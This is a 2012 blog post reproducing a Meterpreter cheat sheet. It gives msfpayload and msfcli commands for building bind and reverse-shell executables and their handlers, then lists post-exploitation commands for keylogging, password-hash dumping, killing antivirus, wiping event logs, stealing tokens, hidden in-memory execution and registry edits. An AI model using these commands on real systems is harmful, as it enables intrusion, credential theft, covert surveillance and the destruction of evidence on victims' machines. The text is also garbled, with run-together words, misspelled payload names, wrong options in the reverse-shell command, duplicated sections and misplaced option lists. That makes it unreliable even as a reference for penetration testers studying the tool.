Executing Meterpreter
As a MetasploitExploitPayload(bind_tcp) forbindshellor(reverse_tcp) forreverse shell
As Standalonebinarytobeuploadedand executedonthetarget system:
./msfpayloadwindows/meterpreter/bind_tcpLPORT=443 X > meterpreter.exe (BindShell)
./msfcliexploit/multi/handlerPAYLOAD=windows/meterpeter/bind_tcpLPORT=443 RHOST=<IP>
./msfpayloadwndows/meterpreter/reverse_tcpRHOST=<IP> RPORT=443 X > meterpreter.exe (Reverse Shell)
./msfcliexploit/multi/handlerPAYLOAD=windows/meterpreter/reverse_tcpLPORT=443 E
UserInterface Commands
meterpreter> keyscan_start
Starts recording user key typing
meterpreter>keyscan_dump
Dumps the user’s key strokes
meterpreter> keyscan_stop
Stops recording user typing
Core Commands
meterpreter> background
PutstheMeterpretersession inbackground mode.Session could berecovered typing:
sessions–l ( toidentifysessionID)
sessions–i <SessionID>
meterpreter> irb
Opens meterpreterscripting menu
meterpreter> use <library>
Permitsloadingextrameterpreter functionalities with the following loadable libraries
espia
incognito
priv
sniffer
Allows Desktop spying through screenshots
Allows user impersonation sort of commands
Allows filesystem and hash dumping commands
Allows network sniffing interaction commands
meterpreter> run<script>
crcheckvm
edcollect
get_local_subnets
getcountermeasure
getgui
gettelnet
hashdump
keylogrecorder
killav
metsvc
migrate
netenum
prefetchtool
vnc_oneport/ vnc
sheduleme
winenum
File System Commands
meterpreter> getwd
Obtain current working directory on Server’s Side
meterpreter> getlwd
Obtain local current working directory
meterpreter> del <file>
Deletes the given file
meterpreter> cat <file>
Read the given file
meterpreter> edit <file>
Edit the given file
meterpreter> upload <src file> <dst file>
Upload a file to the target host
meterpreter> download <src file> <dst file>
Download a file from the target host
Networking Commands
meterpreter> portfwd
Establishportforwardingconnectionsthroughmeterpretertunnels:
Options:
-L Local host to listen on
-l Local port to listen on
-p Remote port to connect to
-r Remote host to connect
SystemCommands
meterpreter> sysinfo
Provides information about target host
meterpreter> getuid
Obtain the username responsible for the current process
meterpreter> kill <pid>
Kill the given process identified by PID
meterpreter> ps
List all running processes
meterpreter> shell
Obtain interactive windows OS Shell
meterpreter> execute –f file [Options]
Execute the given “file” on the OS target host.
Options:
-H Create the process hidden from view
-a Arguments to pass to the command
-i Interact with the process after creating it
-m Execute from memmory
-t Execute process with currently impersonated thread token
meterpreter> clearav
Clears and secure removes event logs
meterpreter> steal_token
Attemps to steal an impersonation token from the target process
meterpreter> reg <Command> [Options]
Interact with the target OS Windows Registry using the following options and commands:
commands:
enumkey Enumerate the supplied registry key
createkey / deletekey Create/deleted the supplied registry key
setval / queryval Set/query values from the supplied registry key
meterpreter> execute –f file [Options]
Execute the given “file” on the OS target host.
Options:
-H Create the process hidden from view
-a Arguments to pass to the command
-i Interact with the process after creating it
-m Execute from memmory
-t Execute process with currently impersonated thread token
Options:
-d Data to store in the registry value
-k The registry key
-v The registry value name
meterpreter> ipconfig
Displays network interfaces information
meterpreter> route
View and modify networking routing table
meterpreter> portfwd
Establishportforwardingconnectionsthroughmeterpretertunnels:
Options:
-L Local host to listen on
-l Local port to listen on
-p Remote port to connect to
-r Remote host to connect to
SUMBER GOOGLE
Saturday, 28 January 2012
Linux
0 Response to "Meterpreter Cheat Sheet"
Post a Comment